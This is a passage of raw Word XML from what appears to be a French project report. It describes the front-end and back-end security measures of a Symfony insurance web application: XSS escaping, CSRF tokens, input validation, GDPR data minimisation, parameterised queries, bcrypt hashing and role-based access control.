              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="696549C9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F44988B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Validation des entrées côté client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="759CCE21" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="001D6F90">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">Contraintes Symfony </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>Validator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>NotBlank</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>, Email, Length…) appliquées côté serveur, reflétées dans les attributs HTML5 du formulaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B9CCCB0" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="116EABFF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DCC99A8" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>RGPD – Mentions légales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D2FA29D" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="001D6F90" w:rsidRDefault="003239D4" w:rsidP="001D6F90">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>Lien Mentions légales dans le pied de page, collecte minimale des données (prénom, nom, email), documents justificatifs stockés côté serveur uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="077E401F" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DC91B18" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="58692358" w14:textId="4E1953CC" w:rsidR="00786344" w:rsidRDefault="00786344" w:rsidP="00786344">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786344">
        <w:t>Description technique des protections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>front-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0721502C" w14:textId="5E4B9217" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc233817788"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Protection contre le XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="240D6368" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Twig active l'échappement automatique sur toutes les variables affichées dans les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>templates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Toute valeur issue de la base de données ou d'un formulaire est </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>convertie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en entités HTML avant affichage, rendant inoffensif tout caractère spécial injecté. Dans les scripts JavaScript, l'utilisation de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> au lieu de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lors du chargement dynamique des sélects (marque, modèle, année) empêche l'exécution de tout balisage HTML provenant des réponses JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB41D5" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="350952EF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc233817789"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Protection contre le CSRF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="41BF6A66" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les formulaires Symfony embarquent automatiquement un jeton CSRF généré à chaque affichage du formulaire et vérifié à la soumission. Pour les boutons d'action destructives (suppression d'un devis, annulation d'une souscription) qui ne passent pas par le composant Form, un jeton est généré manuellement via la fonction Twig </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">('action-id') et transmis dans un champ caché. Côté serveur, chaque action sensible appelle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isCsrfTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() avant d'effectuer la modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6761A125" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="276FFD55" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc233817790"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Validation des entrées côté client</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="0E566725" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le composant Form de Symfony applique les contraintes de validation (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NotBlank</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Email, Length, Regex) définies sur les entités. Ces contraintes sont reflétées dans les attributs HTML5 du formulaire (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>required</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxlength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, type) pour un retour immédiat à l'utilisateur. La validation côté serveur reste la référence : si un utilisateur contourne les contrôles HTML, les contraintes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Validator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rejettent quand même la requête.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFB1F0" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="0C1A0035" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc233817791"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>RGPD et mentions légales</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="5C86B7AF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'application collecte un minimum de données personnelles : prénom, nom et adresse e-mail lors de l'inscription, auxquels s'ajoutent les documents justificatifs (permis de conduire, carte grise) lors de la souscription. Ces documents sont stockés côté serveur et non accessibles publiquement. Un lien Mentions légales est présent dans le pied de page de toutes les pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3741AAE3" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="6D459909" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220CCE8E" w14:textId="66FC7F8F" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc233817792"/>
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00B90A61">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sécurité côté </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>back-end</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:proofErr w:type="spellEnd"/>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610"/>
        <w:gridCol w:w="3156"/>
        <w:gridCol w:w="2260"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5F4C" w14:paraId="001B9B7F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="605CE0CC" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnérabilité / Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="6628C953" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mesure mise en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="45C05F7A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Statut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="131504BE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E291840" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Injection SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4994232C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">Doctrine ORM avec </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>QueryBuilder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>setParameter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>() : aucune valeur utilisateur n'est concaténée dans le SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="531621A1" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="3AEB9D54" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2863AC0A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Authentification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12CBCC42" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">Symfony </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>PasswordHasher</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>bcrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>) pour le hachage des mots de passe + Symfony Security pour la gestion des sessions et du pare-feu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F67C48A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="5011DE10" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BFF6605" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Contrôle des accès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FF9CB1A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>Rôles ROLE_USER et ROLE_ADMIN, attribut #[IsGranted] sur les contrôleurs d'administration, redirection automatique vers la page de connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CF14C87" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="7DA4911D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5880F1F0" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
